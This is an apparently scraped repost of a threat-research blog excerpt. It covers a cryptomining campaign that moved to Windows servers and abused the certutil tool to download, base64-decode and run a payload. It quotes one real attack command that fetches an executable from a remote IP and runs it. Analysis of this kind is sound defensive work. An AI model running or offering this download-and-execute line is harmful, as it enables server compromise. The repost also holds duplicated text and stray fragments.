Old Dog, New Targets: Switching to Windows to Mine Electroneum
- by nlqip
Figure 2: Latest attack request targeting Windows servers
As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file.
Using the Windows certutil Tool
While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used to download and upload jobs. We have already have witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:
certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe
The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.
“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”
However, a lesser known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability using base64 encoding certificate format, as shown in Figure 3.
Source link
lol
Figure 2: Latest attack request targeting Windows servers As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file. Using the Windows certutil Tool While Linux…
Recent Posts
- Microsoft rolls out Recall to Windows Insiders with Copilot+ PCs
- Five Companies That Came To Win This Week
- The 10 Hottest Semiconductor Startups Of 2024
- Cybersecurity Snapshot: Prompt Injection and Data Disclosure Top OWASP’s List of Cyber Risks for GenAI LLM Apps
- Healthcare Ransomware Attacks: How to Prevent and Respond Effectively | BlackFog